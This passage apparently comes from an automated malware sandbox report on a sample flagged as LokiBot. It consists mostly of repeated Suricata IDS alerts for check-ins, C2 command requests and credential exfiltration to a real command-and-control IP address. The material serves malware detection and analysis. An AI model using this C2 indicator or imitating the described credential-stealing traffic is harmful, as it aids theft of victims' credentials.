              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeJoe Sandbox ML: detected
              Source: YvVDV4cbjy.exeJoe Sandbox ML: detected
              Source: YvVDV4cbjy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: YvVDV4cbjy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49708 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49708 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49708 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49720 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49720 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49720 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49721 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49724 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49724 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49724 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49708 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49777 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49707 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49707 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49707 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49707 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49720 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49720 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49714 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49714 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49714 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49784 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49784 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49784 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49784 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49784 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49714 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49714 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49721 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49721 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49718 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49721 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49721 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49796 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49796 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49796 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49777 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49816 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49777 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49816 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49816 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49796 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49796 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49804 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49716 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49716 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49716 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49816 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49816 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49725 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49725 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49725 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49716 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49716 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49718 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49718 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49826 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49826 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49826 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49718 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49718 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49804 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49804 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49725 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49725 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49804 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49804 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49826 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49826 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49834 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49834 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49834 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49834 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49834 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49717 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49717 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49717 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49855 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49790 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49790 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49790 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49713 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49713 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49713 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49862 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49862 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49862 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49755 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49755 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49743 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49755 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49743 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49743 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49717 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49717 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49713 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49713 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49862 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49862 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49755 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49755 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49743 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49743 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49719 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49719 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49719 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49719 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49719 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49724 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49724 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49855 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49855 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49855 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49855 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49777 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49777 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49790 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49790 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49749 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49749 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49749 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49749 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49749 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49884 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49884 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49884 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49884 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49884 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49730 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49730 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49730 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49821 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49730 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49730 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49821 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49821 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49911 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49911 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49911 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49911 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49911 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49934 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49934 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49934 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49934 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49934 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49849 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49849 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49849 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49849 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49849 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49821 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49821 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49919 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49919 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49919 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49840 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49919 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49919 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49840 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49840 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49840 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49840 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49709 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49709 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49761 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49761 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49761 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49761 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49761 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49709 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49709 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49709 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49961 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49961 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49961 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49961 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49961 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49953 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49953 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49953 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49968 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49968 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49968 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49711 -> 94.156.177.41:80
